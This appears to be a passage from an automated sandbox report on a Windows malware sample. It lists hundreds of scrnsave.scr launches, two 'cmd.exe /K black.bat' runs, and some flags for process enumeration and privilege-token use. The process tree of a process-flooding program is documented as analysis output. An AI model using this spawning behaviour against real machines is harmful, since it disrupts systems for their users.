C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2596

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2776

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2436

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2972

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2880

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2592

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3064

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2888

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2680

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2128

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2708

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3052

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2968

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:700

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2140

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1428

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2208

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2224

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2336

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1108

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2568

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2132

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2564

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:976

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2868

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2740

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2864

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2684

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1648

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2920

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:240

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2092

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2128

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2792

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2708

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3044

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2232

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:992

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:968

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2184

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:300

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2272

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2396

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2156

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2152

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2760

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2800

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2608

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2768

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2772

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1740

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1848

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2920

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2144

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2904

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2792

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3024

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2912

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3044

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1924

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2404

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1592

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1756

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2416

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1324

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1356

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:692

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2204

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2264

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1280

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1384

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3028

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2876

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2056

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2640

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2424

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3064

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:428

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2232

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2756

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3012

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1240

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3040

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2444

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2260

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2612

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2328

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2916

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2300

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2900

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2772

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2128

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1424

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:868

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2904

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2956

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3044

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2088

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2404

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2160

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2924

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2228

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2416

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3004

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2528

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3052

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2960

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2676

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2832

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2880

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2808

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2204

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2932

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2828

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3048

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2064

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2684

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2236

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2084

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2908

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1240

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1760

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2356

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2568

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2140

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2328

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2988

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:844

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1240

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3020

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2216

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2208

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2768

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1596

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2440

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2852

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2700

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2608

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2880

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1424

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1324

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2952

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2960

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1356

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2208

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2768

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2196

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2916

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:976

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3032

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1596

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1244

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2972

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2380

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2480

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:868

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2376

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2608

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:564

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2584

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:428

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2688

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:668

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2636

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2768

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1488

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2188

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2356

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2676

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3020

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1620

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2380

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3028

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2816

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2456

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2904

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:700

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2316

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2780

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K black.bat
2⤵
PID:1780

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K black.bat
2⤵
PID:1512

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1384

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1624

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1848

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1984

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:520

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1428

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2092

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2152

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2248

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2368

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2560

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2664

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2712

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2752

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2800

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2848

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2900

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2948

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2992

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3040

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1104

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2104

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2232

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1664

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2380

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2284

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2440

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2580

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2552

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2628

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2720

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2776

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2532

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2932

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2904

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2980

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2996

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:632

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:888

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2184

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2604

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2476

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2700

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2064

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2692

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2836

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2824

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2420

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2876

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2752

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2068

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3032

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2324

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3060

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2424

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2496

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1924

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:836

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:632

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:684

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1240

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2248

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2676

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2328

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2448

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2060

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:692

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2716

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2860

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2828

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1384

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1424

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2732

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2624

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2068

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2144

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2084

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2940

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2936

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:428

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2332

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2088

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2512

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:896

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2388

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1488

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2652

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2568

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:784

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2868

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1840

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2452

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3028

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2900

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1308

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2092

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1952

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2172

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2080

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2712

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2968

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2280

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2464

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2076

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3020

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2224

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2472

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620

C:\Windows\system32\scrnsave.scr
